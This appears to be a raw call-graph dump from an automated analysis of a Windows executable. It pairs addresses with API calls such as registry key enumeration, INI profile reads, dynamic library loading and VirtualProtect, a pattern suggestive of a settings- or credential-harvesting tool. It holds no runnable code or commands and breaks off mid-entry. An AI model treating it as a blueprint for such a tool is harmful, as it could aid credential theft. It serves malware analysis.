33301->33280 33304 40d0f9 GetMessageA 33305 40d17b 33304->33305 33306 40d10d 33304->33306 33305->33278 33307 40d113 TranslateAccelerator 33306->33307 33309 40d145 IsDialogMessage 33306->33309 33310 40d139 IsDialogMessage 33306->33310 33307->33306 33308 40d16d GetMessageA 33307->33308 33308->33305 33308->33307 33309->33308 33311 40d157 TranslateMessage DispatchMessageA 33309->33311 33310->33308 33310->33309 33311->33308 33313 404ac4 GetProcAddress 33312->33313 33314 404ae8 33312->33314 33315 404ad4 33313->33315 33316 404add FreeLibrary 33313->33316 33317 404b13 33314->33317 33318 404afc MessageBoxA 33314->33318 33315->33316 33316->33314 33317->33263 33318->33263 33320 410d17 LoadLibraryA 33319->33320 33321 410d3c 33319->33321 33320->33321 33322 410d2b GetProcAddress 33320->33322 33321->33265 33322->33321 33324 40cd08 ??2@YAPAXI 33323->33324 33326 40cd26 33324->33326 33327 40cd2d 33324->33327 33394 404025 6 API calls 33326->33394 33329 40cd66 33327->33329 33330 40cd59 DeleteObject 33327->33330 33387 407088 33329->33387 33330->33329 33332 40cd6b 33390 4019b5 33332->33390 33335 4019b5 strncat 33336 40cdbf _mbscpy 33335->33336 33336->33267 33396 407948 ??3@YAXPAX ??3@YAXPAX 33337->33396 33339 407e04 33397 407a55 33339->33397 33342 407a1f malloc memcpy ??3@YAXPAX ??3@YAXPAX 33349 407cf7 33342->33349 33343 407ddc 33343->33339 33409 407a1f 33343->33409 33345 407d7a ??3@YAXPAX 33345->33349 33349->33339 33349->33342 33349->33343 33349->33345 33400 40796e 7 API calls 33349->33400 33401 406f30 33349->33401 33351 407e30 33352 407e57 33351->33352 33353 407e38 33351->33353 33352->33272 33352->33273 33353->33352 33354 407e41 _strcmpi 33353->33354 33354->33352 33354->33353 33415 4097ff 33355->33415 33357 409854 33420 409731 33357->33420 33361 4097ff 3 API calls 33360->33361 33362 409723 33361->33362 33440 40966c 33362->33440 33454 4023b2 33365->33454 33371 40ced3 33543 40cdda 7 API calls 33371->33543 33372 40cece 33375 40cf3f 33372->33375 33495 40c3d0 memset GetModuleFileNameA strrchr 33372->33495 33375->33297 33375->33298 33378 40ceed 33522 40affa 33378->33522 33382->33295 33383->33304 33384->33286 33385->33292 33386->33300 33395 406fc7 memset _mbscpy 33387->33395 33389 40709f CreateFontIndirectA 33389->33332 33391 4019e1 33390->33391 33392 4019c2 strncat 33391->33392 33393 4019e5 memset LoadIconA 33391->33393 33392->33391 33393->33335 33394->33327 33395->33389 33396->33349 33398 407a65 33397->33398 33399 407a5b ??3@YAXPAX 33397->33399 33398->33351 33399->33398 33400->33349 33402 406f37 malloc 33401->33402 33403 406f7d 33401->33403 33405 406f73 33402->33405 33406 406f58 33402->33406 33403->33349 33405->33349 33407 406f6c ??3@YAXPAX 33406->33407 33408 406f5c memcpy 33406->33408 33407->33405 33408->33407 33410 407a38 33409->33410 33411 407a2d ??3@YAXPAX 33409->33411 33413 406f30 3 API calls 33410->33413 33412 407a43 33411->33412 33414 40796e 7 API calls 33412->33414 33413->33412 33414->33339 33431 406f96 GetModuleFileNameA 33415->33431 33417 409805 strrchr 33418 409814 33417->33418 33419 409817 _mbscat 33417->33419 33418->33419 33419->33357 33432 44b090 33420->33432 33425 40930c 3 API calls 33426 409779 EnumResourceNamesA EnumResourceNamesA _mbscpy memset 33425->33426 33427 4097c5 LoadStringA 33426->33427 33428 4097db 33427->33428 33428->33427 33430 4097f3 33428->33430 33439 40937a memset GetPrivateProfileStringA WritePrivateProfileStringA _itoa 33428->33439 33430->33278 33431->33417 33433 40973e _mbscpy _mbscpy 33432->33433 33434 40930c 33433->33434 33435 44b090 33434->33435 33436 409319 memset GetPrivateProfileStringA 33435->33436 33437 409374 33436->33437 33438 409364 WritePrivateProfileStringA 33436->33438 33437->33425 33438->33437 33439->33428 33450 406f81 GetFileAttributesA 33440->33450 33442 409675 33443 4096ee 33442->33443 33444 40967a _mbscpy _mbscpy GetPrivateProfileIntA 33442->33444 33443->33279 33451 409278 GetPrivateProfileStringA 33444->33451 33446 4096c9 33452 409278 GetPrivateProfileStringA 33446->33452 33448 4096da 33453 409278 GetPrivateProfileStringA 33448->33453 33450->33442 33451->33446 33452->33448 33453->33443 33545 409c1c 33454->33545 33457 401e69 memset 33584 410dbb 33457->33584 33460 401ec2 33614 4070e3 strlen _mbscat _mbscpy _mbscat 33460->33614 33461 401ed4 33599 406f81 GetFileAttributesA 33461->33599 33464 401ee6 strlen strlen 33466 401f15 33464->33466 33468 401f28 33464->33468 33615 4070e3 strlen _mbscat _mbscpy _mbscat 33466->33615 33600 406f81 GetFileAttributesA 33468->33600 33470 401f35 33601 401c31 33470->33601 33473 401f75 33613 410a9c RegOpenKeyExA 33473->33613 33474 401c31 7 API calls 33474->33473 33476 401f91 33477 402187 33476->33477 33478 401f9c memset 33476->33478 33480 402195 ExpandEnvironmentStringsA 33477->33480 33481 4021a8 _strcmpi 33477->33481 33616 410b62 RegEnumKeyExA 33478->33616 33625 406f81 GetFileAttributesA 33480->33625 33481->33371 33481->33372 33483 40217e RegCloseKey 33483->33477 33484 401fd9 atoi 33485 401fef memset memset sprintf 33484->33485 33492 401fc9 33484->33492 33617 410b1e 33485->33617 33488 402165 33488->33483 33489 402076 memset memset strlen strlen 33489->33492 33490 4070e3 strlen _mbscat _mbscpy _mbscat 33490->33492 33491 4020dd strlen strlen 33491->33492 33492->33483 33492->33484 33492->33488 33492->33489 33492->33490 33492->33491 33493 406f81 GetFileAttributesA 33492->33493 33494 402167 _mbscpy 33492->33494 33624 410b62 RegEnumKeyExA 33492->33624 33493->33492 33494->33483 33496 40c422 33495->33496 33497 40c425 _mbscat _mbscpy _mbscpy 33495->33497 33496->33497 33498 40c49d 33497->33498 33499 40c512 33498->33499 33500 40c502 GetWindowPlacement 33498->33500 33501 40c538 33499->33501 33646 4017d2 GetSystemMetrics GetSystemMetrics SetWindowPos 33499->33646 33500->33499 33639 409b31 33501->33639 33505 40ba28 33506 40ba87 33505->33506 33512 40ba3c 33505->33512 33649 406c62 LoadCursorA SetCursor 33506->33649 33508 40ba43 _mbsicmp 33508->33512 33509 40ba8c 33650 410a9c RegOpenKeyExA 33509->33650 33651 404734 33509->33651 33659 4107f1 33509->33659 33662 404785 33509->33662 33665 403c16 33509->33665 33510 40baa0 33511 407e30 _strcmpi 33510->33511 33515 40bab0 33511->33515 33512->33506 33512->33508 33741 40b5e5 10 API calls 33512->33741 33513 40bafa SetCursor 33513->33378 33515->33513 33516 40baf1 qsort 33515->33516 33516->33513 34102 409ded SendMessageA ??2@YAPAXI ??3@YAXPAX 33522->34102 33524 40b00e 33525 40b016 33524->33525 33526 40b01f GetStdHandle 33524->33526 34103 406d1a CreateFileA 33525->34103 33528 40b01c 33526->33528 33529 40b035 33528->33529 33530 40b12d 33528->33530 34104 406c62 LoadCursorA SetCursor 33529->34104 34108 406d77 9 API calls 33530->34108 33533 40b136 33544 40c580 28 API calls 33533->33544 33534 40b042 33536 40b087 33534->33536 33541 40b0a1 33534->33541 34105 40a57c strlen WriteFile 33534->34105 33536->33541 34106 40a699 12 API calls 33536->34106 33538 40b0d6 33539 40b116 CloseHandle 33538->33539 33540 40b11f SetCursor 33538->33540 33539->33540 33540->33533 33541->33538 34107 406d77 9 API calls 33541->34107 33543->33372 33544->33375 33557 409a32 33545->33557 33548 409c80 memcpy memcpy 33549 409cda 33548->33549 33549->33548 33550 409d18 ??2@YAPAXI ??2@YAPAXI 33549->33550 33554 408db6 12 API calls 33549->33554 33552 409d54 ??2@YAPAXI 33550->33552 33553 409d8b 33550->33553 33552->33553 33567 409b9c 33553->33567 33554->33549 33556 4023c1 33556->33457 33558 409a44 33557->33558 33559 409a3d ??3@YAXPAX 33557->33559 33560 409a52 33558->33560 33561 409a4b ??3@YAXPAX 33558->33561 33559->33558 33562 409a63 33560->33562 33563 409a5c ??3@YAXPAX 33560->33563 33561->33560 33564 409a83 ??2@YAPAXI ??2@YAPAXI 33562->33564 33565 409a73 ??3@YAXPAX 33562->33565 33566 409a7c ??3@YAXPAX 33562->33566 33563->33562 33564->33548 33565->33566 33566->33564 33568 407a55 ??3@YAXPAX 33567->33568 33569 409ba5 33568->33569 33570 407a55 ??3@YAXPAX 33569->33570 33571 409bad 33570->33571 33572 407a55 ??3@YAXPAX 33571->33572 33573 409bb5 33572->33573 33574 407a55 ??3@YAXPAX 33573->33574 33575 409bbd 33574->33575 33576 407a1f 4 API calls 33575->33576 33577 409bd0 33576->33577 33578 407a1f 4 API calls 33577->33578 33579 409bda 33578->33579 33580 407a1f 4 API calls 33579->33580 33581 409be4 33580->33581 33582 407a1f 4 API calls 33581->33582 33583 409bee 33582->33583 33583->33556 33585 410d0e 2 API calls 33584->33585 33586 410dca 33585->33586 33587 410dfd memset 33586->33587 33626 4070ae 33586->33626 33588 410e1d 33587->33588 33629 410a9c RegOpenKeyExA 33588->33629 33591 401e9e strlen strlen 33591->33460 33591->33461 33593 410e4a 33594 410e7f _mbscpy 33593->33594 33630 410d3d _mbscpy 33593->33630 33594->33591 33596 410e5b 33631 410add RegQueryValueExA 33596->33631 33598 410e73 RegCloseKey 33598->33594 33599->33464 33600->33470 33632 410a9c RegOpenKeyExA 33601->33632 33603 401c4c 33604 401cad 33603->33604 33633 410add RegQueryValueExA 33603->33633 33604->33473 33604->33474 33606 401c6a 33607 401c71 strchr 33606->33607 33608 401ca4 RegCloseKey 33606->33608 33607->33608 33609 401c85 strchr 33607->33609 33608->33604 33609->33608 33610 401c94 33609->33610 33634 406f06 strlen 33610->33634 33612 401ca1 33612->33608 33613->33476 33614->33461 33615->33468 33616->33492 33637 410a9c RegOpenKeyExA 33617->33637 33619 410b34 33620 410b5d 33619->33620 33638 410add RegQueryValueExA 33619->33638 33620->33492 33622 410b4c RegCloseKey 33622->33620 33624->33492 33625->33481 33627 4070bd GetVersionExA 33626->33627 33628 4070ce 33626->33628 33627->33628 33628->33587 33628->33591 33629->33593 33630->33596 33631->33598 33632->33603 33633->33606 33635 406f17 33634->33635 33636 406f1a memcpy 33634->33636 33635->33636 33636->33612 33637->33619 33638->33622 33640 409b40 33639->33640 33642 409b4e 33639->33642 33647 409901 memset SendMessageA 33640->33647 33643 409b99 33642->33643 33644 409b8b 33642->33644 33643->33505 33648 409868 SendMessageA 33644->33648 33646->33501 33647->33642 33648->33643 33649->33509 33650->33510 33652 404785 FreeLibrary 33651->33652 33653 40473b LoadLibraryA 33652->33653 33654 40474c GetProcAddress 33653->33654 33657 40476e 33653->33657 33655 404764 33654->33655 33654->33657 33655->33657 33656 404781 33656->33510 33657->33656 33658 404785 FreeLibrary 33657->33658 33658->33656 33660 410807 33659->33660 33661 4107fc FreeLibrary 33659->33661 33660->33510 33661->33660 33663 4047a3 33662->33663 33664 404799 FreeLibrary 33662->33664 33663->33510 33664->33663 33666 4107f1 FreeLibrary 33665->33666 33667 403c30 LoadLibraryA 33666->33667 33668 403c74 33667->33668 33669 403c44 GetProcAddress 33667->33669 33670 4107f1 FreeLibrary 33668->33670 33669->33668 33671 403c5e 33669->33671 33672 403c7b 33670->33672 33671->33668 33674 403c6b 33671->33674 33673 404734 3 API calls 33672->33673 33675 403c86 33673->33675 33674->33672 33742 4036e5 33675->33742 33678 4036e5 26 API calls 33679 403c9a 33678->33679 33680 4036e5 26 API calls 33679->33680 33681 403ca4 33680->33681 33682 4036e5 26 API calls 33681->33682 33683 403cae 33682->33683 33754 4085d2 33683->33754 33691 403ce5 33692 403cf7 33691->33692 33935 402bd1 39 API calls 33691->33935 33800 410a9c RegOpenKeyExA 33692->33800 33695 403d0a 33696 403d1c 33695->33696 33936 402bd1 39 API calls 33695->33936 33801 402c5d 33696->33801 33700 4070ae GetVersionExA 33701 403d31 33700->33701 33819 410a9c RegOpenKeyExA 33701->33819 33703 403d51 33704 403d61 33703->33704 33937 402b22 46 API calls 33703->33937 33820 410a9c RegOpenKeyExA 33704->33820 33707 403d87 33708 403d97 33707->33708 33938 402b22 46 API calls 33707->33938 33821 410a9c RegOpenKeyExA 33708->33821 33711 403dbd 33712 403dcd 33711->33712 33939 402b22 46 API calls 33711->33939 33822 410808 33712->33822 33716 404785 FreeLibrary 33717 403de8 33716->33717 33826 402fdb 33717->33826 33720 402fdb 34 API calls 33721 403e00 33720->33721 33842 4032b7 33721->33842 33730 403e3b 33732 403e73 33730->33732 33733 403e46 _mbscpy 33730->33733 33889 40fb00 33732->33889 33941 40f334 334 API calls 33733->33941 33741->33512 33743 4037c5 33742->33743 33744 4036fb 33742->33744 33743->33678 33942 410863 UuidFromStringA UuidFromStringA memcpy 33744->33942 33746 40370e 33746->33743 33747 403716 strchr 33746->33747 33747->33743 33748 403730 33747->33748 33943 4021b6 memset 33748->33943 33750 40373f _mbscpy _mbscpy strlen 33751 4037a4 _mbscpy 33750->33751 33752 403789 sprintf 33750->33752 33944 4023e5 16 API calls 33751->33944 33752->33751 33755 4085e2 33754->33755 33945 4082cd 11 API calls 33755->33945 33759 408600 33760 403cba 33759->33760 33761 40860b memset 33759->33761 33772 40821d 33760->33772 33948 410b62 RegEnumKeyExA 33761->33948 33763 4086d2 RegCloseKey 33763->33760 33765 408637 33765->33763 33766 40865c memset 33765->33766 33949 410a9c RegOpenKeyExA 33765->33949 33952 410b62 RegEnumKeyExA 33765->33952 33950 410add RegQueryValueExA 33766->33950 33769 408694 33951 40848b 10 API calls 33769->33951 33771 4086ab RegCloseKey 33771->33765 33953 410a9c RegOpenKeyExA 33772->33953 33774 40823f 33775 403cc6 33774->33775 33776 408246 memset 33774->33776 33784 4086e0 33775->33784 33954 410b62 RegEnumKeyExA 33776->33954 33778 4082bf RegCloseKey 33778->33775 33780 40826f 33780->33778 33955 410a9c RegOpenKeyExA 33780->33955 33956 4080ed 11 API calls 33780->33956 33957 410b62 RegEnumKeyExA 33780->33957 33783 4082a2 RegCloseKey 33783->33780 33958 4045db 33784->33958 33786 4088ef 33966 404656 33786->33966 33790 408737 wcslen 33790->33786 33796 40876a 33790->33796 33791 40877a _wcsncoll 33791->33796 33793 404734 3 API calls 33793->33796 33794 404785 FreeLibrary 33794->33796 33795 408812 memset 33795->33796 33797 40883c memcpy wcschr 33795->33797 33796->33786 33796->33791 33796->33793 33796->33794 33796->33795 33796->33797 33798 4088c3 LocalFree 33796->33798 33969 40466b _mbscpy 33796->33969 33797->33796 33798->33796 33799 410a9c RegOpenKeyExA 33799->33691 33800->33695 33970 410a9c RegOpenKeyExA 33801->33970 33803 402c7a 33804 402da5 33803->33804 33805 402c87 memset 33803->33805 33804->33700 33971 410b62 RegEnumKeyExA 33805->33971 33807 402d9c RegCloseKey 33807->33804 33808 410b1e 3 API calls 33809 402ce4 memset sprintf 33808->33809 33972 410a9c RegOpenKeyExA 33809->33972 33811 402d28 33812 402d3a sprintf 33811->33812 33973 402bd1 39 API calls 33811->33973 33974 410a9c RegOpenKeyExA 33812->33974 33815 402cb2 33815->33807 33815->33808 33818 402d9a 33815->33818 33975 402bd1 39 API calls 33815->33975 33976 410b62 RegEnumKeyExA 33815->33976 33818->33807 33819->33703 33820->33707 33821->33711 33823 410816 33822->33823 33824 4107f1 FreeLibrary 33823->33824 33825 403ddd 33824->33825 33825->33716 33977 410a9c RegOpenKeyExA 33826->33977 33828 402ff9 33829 403006 memset 33828->33829 33830 40312c 33828->33830 33978 410b62 RegEnumKeyExA 33829->33978 33830->33720 33832 403122 RegCloseKey 33832->33830 33833 410b1e 3 API calls 33834 403058 memset sprintf 33833->33834 33979 410a9c RegOpenKeyExA 33834->33979 33836 403033 33836->33832 33836->33833 33837 4030a2 memset 33836->33837 33838 410b62 RegEnumKeyExA 33836->33838 33840 4030f9 RegCloseKey 33836->33840 33981 402db3 26 API calls 33836->33981 33980 410b62 RegEnumKeyExA 33837->33980 33838->33836 33840->33836 33843 4032d5 33842->33843 33844 4033a9 33842->33844 33982 4021b6 memset 33843->33982 33857 4034e4 memset memset 33844->33857 33846 4032e1 33983 403166 strlen GetPrivateProfileStringA strchr strlen memcpy 33846->33983 33848 4032ea 33849 4032f8 memset GetPrivateProfileSectionA 33848->33849 33984 4023e5 16 API calls 33848->33984 33849->33844 33854 40332f 33849->33854 33851 40339b strlen 33851->33844 33851->33854 33853 403350 strchr 33853->33854 33854->33844 33854->33851 33985 4021b6 memset 33854->33985 33986 403166 strlen GetPrivateProfileStringA strchr strlen memcpy 33854->33986 33987 4023e5 16 API calls 33854->33987 33858 410b1e 3 API calls 33857->33858 33859 40353f 33858->33859 33860 40357f 33859->33860 33861 403546 _mbscpy 33859->33861 33865 403985 33860->33865 33988 406d55 strlen _mbscat 33861->33988 33863 403565 _mbscat 33989 4033f0 19 API calls 33863->33989 33990 40466b _mbscpy 33865->33990 33869 4039aa 33871 4039ff 33869->33871 33991 40f460 memset memset 33869->33991 34012 40f6e2 33869->34012 34028 4038e8 21 API calls 33869->34028 33872 404785 FreeLibrary 33871->33872 33873 403a0b 33872->33873 33874 4037ca memset memset 33873->33874 34036 444551 memset 33874->34036 33876 4038e2 33876->33730 33940 40f334 334 API calls 33876->33940 33879 40382e 33880 406f06 2 API calls 33879->33880 33881 403843 33880->33881 33882 406f06 2 API calls 33881->33882 33883 403855 strchr 33882->33883 33884 403884 _mbscpy 33883->33884 33885 403897 strlen 33883->33885 33886 4038bf _mbscpy 33884->33886 33885->33886 33887 4038a4 sprintf 33885->33887 34048 4023e5 16 API calls 33886->34048 33887->33886 33890 44b090 33889->33890 33891 40fb10 RegOpenKeyExA 33890->33891 33892 403e7f 33891->33892 33893 40fb3b RegOpenKeyExA 33891->33893 33903 40f96c 33892->33903 33894 40fb55 RegQueryValueExA 33893->33894 33895 40fc2d RegCloseKey 33893->33895 33896 40fc23 RegCloseKey 33894->33896 33897 40fb84 33894->33897 33895->33892 33896->33895 33898 404734 3 API calls 33897->33898 33899 40fb91 33898->33899 33899->33896 33900 40fc19 LocalFree 33899->33900 33901 40fbdd memcpy memcpy 33899->33901 33900->33896 34053 40f802 11 API calls 33901->34053 33904 4070ae GetVersionExA 33903->33904 33905 40f98d 33904->33905 33906 4045db 7 API calls 33905->33906 33910 40f9a9 33906->33910 33907 40fae6 33908 404656 FreeLibrary 33907->33908 33909 403e85 33908->33909 33915 4442ea memset 33909->33915 33910->33907 33911 40fa13 memset WideCharToMultiByte 33910->33911 33911->33910 33912 40fa43 _strnicmp 33911->33912 33912->33910 33913 40fa5b WideCharToMultiByte 33912->33913 33913->33910 33914 40fa88 WideCharToMultiByte 33913->33914 33914->33910 33916 410dbb 9 API calls 33915->33916 33917 444329 33916->33917 34054 40759e strlen strlen 33917->34054 33922 410dbb 9 API calls 33923 444350 33922->33923 33924 40759e 3 API calls 33923->33924 33925 44435a 33924->33925 33926 444212 65 API calls 33925->33926 33927 444366 memset memset 33926->33927 33928 410b1e 3 API calls 33927->33928 33929 4443b9 ExpandEnvironmentStringsA strlen 33928->33929 33930 4443f4 _strcmpi 33929->33930 33931 4443e5 33929->33931 33932 403e91 33930->33932 33933 44440c 33930->33933 33931->33930 33932->33510 33934 444212 65 API calls 33933->33934 33934->33932 33935->33692 33936->33696 33937->33704 33938->33708 33939->33712 33940->33730 33941->33732 33942->33746 33943->33750 33944->33743 33946 40841c 33945->33946 33947 410a9c RegOpenKeyExA 33946->33947 33947->33759 33948->33765 33949->33765 33950->33769 33951->33771 33952->33765 33953->33774 33954->33780 33955->33780 33956->33783 33957->33780 33959 404656 FreeLibrary 33958->33959 33960 4045e3 LoadLibraryA 33959->33960 33961 404651 33960->33961 33962 4045f4 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 33960->33962 33961->33786 33961->33790 33963 40463d 33962->33963 33964 404643 33963->33964 33965 404656 FreeLibrary 33963->33965 33964->33961 33965->33961 33967 403cd2 33966->33967 33968 40465c FreeLibrary 33966->33968 33967->33799 33968->33967 33969->33796 33970->33803 33971->33815 33972->33811 33973->33812 33974->33815 33975->33815 33976->33815 33977->33828 33978->33836 33979->33836 33980->33836 33981->33836 33982->33846 33983->33848 33984->33849 33985->33853 33986->33854 33987->33854 33988->33863 33989->33860 33990->33869 34029 4078ba 33991->34029 33994 4078ba _mbsnbcat 33995 40f5a3 RegOpenKeyExA 33994->33995 33996 40f5c3 RegQueryValueExA 33995->33996 33997 40f6d9 33995->33997 33998 40f6d0 RegCloseKey 33996->33998 33999 40f5f0 33996->33999 33997->33869 33998->33997 33999->33998 34000 40f675 33999->34000 34033 40466b _mbscpy 33999->34033 34000->33998 34034 4012ee strlen 34000->34034 34002 40f611 34004 404734 3 API calls 34002->34004 34009 40f616 34004->34009 34005 40f69e RegQueryValueExA 34005->33998 34006 40f6c1 34005->34006 34006->33998 34007 40f66a 34008 404785 FreeLibrary 34007->34008 34008->34000 34009->34007 34010 40f661 LocalFree 34009->34010 34011 40f645 memcpy 34009->34011 34010->34007 34011->34010 34035 40466b _mbscpy 34012->34035 34014 40f6fa 34015 4045db 7 API calls 34014->34015 34016 40f708 34015->34016 34017 404734 3 API calls 34016->34017 34022 40f7e2 34016->34022 34023 40f715 34017->34023 34018 404656 FreeLibrary 34019 40f7f1 34018->34019 34020 404785 FreeLibrary 34019->34020 34021 40f7fc 34020->34021 34021->33869 34022->34018 34023->34022 34024 40f797 WideCharToMultiByte 34023->34024 34025 40f7b8 strlen 34024->34025 34026 40f7d9 LocalFree 34024->34026 34025->34026 34027 40f7c8 _mbscpy 34025->34027 34026->34022 34027->34026 34028->33869 34030 4078e6 34029->34030 34031 4078c7 _mbsnbcat 34030->34031 34032 4078ea 34030->34032 34031->34030 34032->33994 34033->34002 34034->34005 34035->34014 34049 410a9c RegOpenKeyExA 34036->34049 34038 44458b 34039 40381a 34038->34039 34050 410add RegQueryValueExA 34038->34050 34039->33876 34047 4021b6 memset 34039->34047 34041 4445a4 34042 4445dc RegCloseKey 34041->34042 34051 410add RegQueryValueExA 34041->34051 34042->34039 34044 4445c1 34044->34042 34052 444879 30 API calls 34044->34052 34046 4445da 34046->34042 34047->33879 34048->33876 34049->34038 34050->34041 34051->34044 34052->34046 34053->33900 34055 4075c9 34054->34055 34056 4075bb _mbscat 34054->34056 34057 444212 34055->34057 34056->34055 34074 407e9d 34057->34074 34060 44424d 34061 444274 34060->34061 34062 444258 34060->34062 34082 407ef8 34060->34082 34063 407e9d 9 API calls 34061->34063 34099 444196 52 API calls 34062->34099 34070 4442a0 34063->34070 34065 407ef8 9 API calls 34065->34070 34066 4442ce 34096 407f90 34066->34096 34070->34065 34070->34066 34072 444212 65 API calls 34070->34072 34092 407e62 34070->34092 34071 407f90 FindClose 34073 4442e4 34071->34073 34072->34070 34073->33922 34075 407f90 FindClose 34074->34075 34076 407eaa 34075->34076 34077 406f06 2 API calls 34076->34077 34078 407ebd strlen strlen 34077->34078 34079 407ee1 34078->34079 34080 407eea 34078->34080 34100 4070e3 strlen _mbscat _mbscpy _mbscat 34079->34100 34080->34060 34083 407f03 FindFirstFileA 34082->34083 34084 407f24 FindNextFileA 34082->34084 34085 407f3f 34083->34085 34086 407f46 strlen strlen 34084->34086 34087 407f3a 34084->34087 34085->34086 34089 407f7f 34085->34089 34086->34089 34090 407f76 34086->34090 34088 407f90 FindClose 34087->34088 34088->34085 34089->34060 34101 4070e3 strlen _mbscat _mbscpy _mbscat 34090->34101 34093 407e6c strcmp 34092->34093 34095 407e94 34092->34095 34094 407e83 strcmp 34093->34094 34093->34095 34094->34095 34095->34070 34097 407fa3 34096->34097 34098 407f99 FindClose 34096->34098 34097->34071 34098->34097 34099->34060 34100->34080 34101->34089 34102->33524 34103->33528 34104->33534 34105->33536 34106->33541 34107->33538 34108->33533 34117 411853 RtlInitializeCriticalSection memset 34118 401455 ExitProcess GetWindowLongA SetWindowLongA EnumChildWindows EnumChildWindows 34291 40a256 13 API calls 34293 432e5b 17 API calls 34295 43fa5a 20 API calls 34120 401060 41 API calls 34298 427260 CloseHandle memset memset 33198 410c68 FindResourceA 33199 410c81 SizeofResource 33198->33199 33202 410cae 33198->33202 33200 410c92 LoadResource 33199->33200 33199->33202 33201 410ca0 LockResource 33200->33201 33200->33202 33201->33202 34300 405e69 14 API calls 34125 433068 15 API calls __fprintf_l 34302 414a6d 18 API calls 34303 43fe6f 134 API calls 34127 424c6d 15 API calls __fprintf_l 34304 426741 19 API calls 34129 440c70 17 API calls 34130 443c71 44 API calls 34133 427c79 24 API calls 34307 416e7e memset __fprintf_l 34137 42800b 47 API calls 34138 425115 85 API calls __fprintf_l 34310 41960c 61 API calls 34139 43f40c 122 API calls __fprintf_l 34142 411814 InterlockedCompareExchange RtlDeleteCriticalSection 34143 43f81a 20 API calls 34145 414c20 memset memset 34146 410c22 memset _itoa WritePrivateProfileStringA GetPrivateProfileIntA 34314 414625 18 API calls 34315 404225 modf 34316 403a26 strlen WriteFile 34318 40422a 12 API calls 34322 427632 memset memset memcpy 34323 40ca30 59 API calls 34324 404235 26 API calls 34147 42ec34 61 API calls __fprintf_l 34148 425115 76 API calls __fprintf_l 34325 425115 77 API calls __fprintf_l 34327 44223a 38 API calls 34154 43183c 112 API calls 34328 44b2c5 _onexit __dllonexit 34333 42a6d2 memcpy __allrem 34156 405cda 65 API calls 34341 43fedc 138 API calls 34342 4116e1 16 API calls __fprintf_l 34159 4244e6 19 API calls 34161 42e8e8 127 API calls __fprintf_l 34162 4118ee RtlLeaveCriticalSection 34347 43f6ec 22 API calls 34164 425115 119 API calls __fprintf_l 33188 410cf3 EnumResourceNamesA 34350 4492f0 memcpy memcpy 34352 43fafa 18 API calls 34354 4342f9 15 API calls __fprintf_l 34165 4144fd 19 API calls 34356 4016fd NtdllDefWindowProc_A ??2@YAPAXI memset memcpy ??3@YAXPAX 34357 40b2fe LoadIconA LoadIconA SendMessageA SendMessageA SendMessageA 34360 443a84 _mbscpy 34362 43f681 17 API calls 34168 404487 22 API calls 34364 415e8c 16 API calls __fprintf_l 34172 411893 RtlDeleteCriticalSection __fprintf_l 34173 41a492 42 API calls 34368 403e96 34 API calls 34369 410e98 memset SHGetPathFromIDList SendMessageA 34175 426741 109 API calls __fprintf_l 34176 4344a2 18 API calls 34177 4094a2 10 API calls 34372 4116a6 15 API calls __fprintf_l 34373 43f6a4 17 API calls 34374 440aa3 20 API calls 34376 427430 45 API calls 34180 4090b0 7 API calls 34181 4148b0 15 API calls 34183 4118b4 RtlEnterCriticalSection 34184 4014b7 CreateWindowExA 34185 40c8b8 19 API calls 34187 4118bf RtlTryEnterCriticalSection 34381 42434a 18 API calls __fprintf_l 34383 405f53 12 API calls 34195 43f956 59 API calls 34197 40955a 17 API calls 34198 428561 36 API calls 34199 409164 7 API calls 34387 404366 19 API calls 34391 40176c ExitProcess 34394 410777 42 API calls 34204 40dd7b 51 API calls 34205 425d7c 16 API calls __fprintf_l 34396 43f6f0 25 API calls 34397 42db01 22 API calls 34206 412905 15 API calls __fprintf_l 34398 403b04 54 API calls 34399 405f04 SetDlgItemTextA GetDlgItemTextA 34400 44b301 ??3@YAXPAX 34403 4120ea 14 API calls 3 library calls 34404 40bb0a 8 API calls 34406 413f11 strcmp 34210 434110 17 API calls __fprintf_l 34213 425115 108 API calls __fprintf_l 34407 444b11 _onexit 34215 425115 76 API calls __fprintf_l 34218 429d19 10 API calls 34410 444b1f __dllonexit 34411 409f20 _strcmpi 34220 42b927 31 API calls 34414 433f26 19 API calls __fprintf_l 34415 44b323 FreeLibrary 34416 427f25 46 API calls 34417 43ff2b 17 API calls 34418 43fb30 19 API calls 34227 414d36 16 API calls 34229 40ad38 7 API calls 34420 433b38 16 API calls __fprintf_l 34421 44b33b ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX 34233 426741 21 API calls 34234 40c5c3 125 API calls 34236 43fdc5 17 API calls 34422 4117c8 InterlockedCompareExchange RtlInitializeCriticalSection 34239 4161cb memcpy memcpy memcpy memcpy 33203 44b3cf 33204 44b3e6 33203->33204 33206 44b454 33203->33206 33204->33206 33210 44b40e 33204->33210 33207 44b405 33207->33206 33208 44b435 VirtualProtect 33207->33208 33208->33206 33209 44b444 VirtualProtect 33208->33209 33209->33206 33211 44b413 33210->33211 33214 44b454 33211->33214 33217 44b42b 33211->33217 33213 44b41c 33213->33214 33215 44b435 VirtualProtect 33213->33215 33215->33214 33216 44b444 VirtualProtect 33215->33216 33216->33214 33218 44b431 33217->33218 33219 44b435 VirtualProtect 33218->33219 33221 44b454 33218->33221 33220 44b444 VirtualProtect 33219->33220 33219->33221 33220->33221 34427 43ffc8 18 API calls 34240 4281cc 15 API calls __fprintf_l 34429 4383cc 110 API calls __fprintf_l 34241 4275d3 41 API calls 34430 4153d3 22 API calls __fprintf_l 34242 444dd7 _XcptFilter 34435 4013de 15 API calls 34437 425115 111 API calls __fprintf_l 34438 43f7db 18 API calls 34441 410be6 WritePrivateProfileStringA GetPrivateProfileStringA 34244 4335ee 16 API calls __fprintf_l 34443 429fef 11 API calls 34245 444deb _exit _c_exit 34444 40bbf0 138 API calls 34248 425115 79 API calls __fprintf_l 34448 437ffa 22 API calls 34252 4021ff 14 API calls 34253 43f5fc 149 API calls 34449 40e381 9 API calls 34255 405983 40 API calls 34256 42b186 27 API calls __fprintf_l 34257 427d86 76 API calls 34258 403585 20 API calls 34260 42e58e 18 API calls __fprintf_l 34263 425115 75 API calls __fprintf_l 34265 401592 8 API calls 33189 410b92 33192 410a6b 33189->33192 33191 410bb2 33193 410a77 33192->33193 33194 410a89 GetPrivateProfileIntA 33192->33194 33197 410983 memset _itoa WritePrivateProfileStringA 33193->33197 33194->33191 33196 410a84 33196->33191 33197->33196 34453 434395 16 API calls 34267 441d9c memcmp 34455 43f79b 119 API calls 34268 40c599 43 API calls 34456 426741 87 API calls 34272 4401a6 21 API calls 34274 